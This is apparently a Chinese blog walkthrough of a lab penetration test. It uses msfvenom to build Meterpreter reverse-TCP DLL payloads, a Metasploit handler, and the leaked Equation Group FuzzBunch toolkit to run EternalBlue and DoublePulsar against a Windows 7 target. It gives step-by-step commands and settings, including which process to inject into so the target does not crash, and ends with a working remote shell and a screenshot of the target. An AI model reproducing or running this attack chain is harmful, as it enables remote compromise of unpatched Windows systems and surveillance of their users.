攻击机:

Kali:192.168.1.103

Win2K3:192.168.1.109

靶机:

Win7(x86):192.168.1.108

 

1、win2K3上要先装好Python运行环境:

安装Python-2.6.6.msipywin32-221.win32-py2.6.exe

 

2、现在kali上生成payload模块:

目标主机x86平台:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=5555 -f dll > x86.dll

目标主机x64平台:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=5555 -f dll > x64.dll

然后将payload文件拷贝到win2K3C盘根目录下

 

3、打开msf

msfconsole

设置exploit模块

use exploit/multi/handler

set LHOST 192.168.1.103

set LPORT 5555

目标主机x86平台:

set PAYLOAD windows/meterpreter/reverse_tcp

目标主机x64平台:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

开始监听

exploit

 方程式工具渗透实战

 

4、在win2K3,打开方程式工具包,在Windows目录下

 方程式工具渗透实战

新建一个名为listeningposts文件夹

 方程式工具渗透实战

否则程序会运行出错。

运行fb.py文件(以下是在特殊的地方设置,未做说明的地方回车选择默认设置)

 方程式工具渗透实战

由于win2k3安装在虚拟机,为了节省空间只设了一个C盘,所以日志位置设置在C

 方程式工具渗透实战

新建一个工程,name自定义

 方程式工具渗透实战

先用永恒之蓝在目标主机上安装后门

 方程式工具渗透实战

之后回车,target主机选择win72K8R2

 方程式工具渗透实战

Mode选择FB

 方程式工具渗透实战

之后回车默认选择,然后就在目标主机上安装了后门了

 方程式工具渗透实战

然后用怒怼模块

 方程式工具渗透实战

协议选择SMB

 方程式工具渗透实战

平台选择x86

 方程式工具渗透实战

攻击形式选择rundll

 方程式工具渗透实战

Payload选择刚才生成的x86.dll,填入路径

 方程式工具渗透实战

选择被注入的进程,在实验的时候如果选择默认的进程lsass.exe,在注入过程中会导致靶机重启,所以这里填入explorer.exe

 方程式工具渗透实战

然后回车、回车

直到注入成功

 方程式工具渗透实战

kali上就可以看到回弹

 方程式工具渗透实战

getuid显示靶机IDtest-PC

 方程式工具渗透实战

screenshot截屏

 方程式工具渗透实战

存储在/root/XxmgVxIn.jpeg,就可以看到靶机的屏幕截图

 方程式工具渗透实战

 

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2021-11-09
  • 2021-06-25
  • 2022-01-19
  • 2021-05-24
  • 2021-12-21
  • 2022-01-04
猜你喜欢
  • 2021-05-03
  • 2022-01-25
  • 2021-11-23
  • 2022-03-01
  • 2022-01-31
相关资源
相似解决方案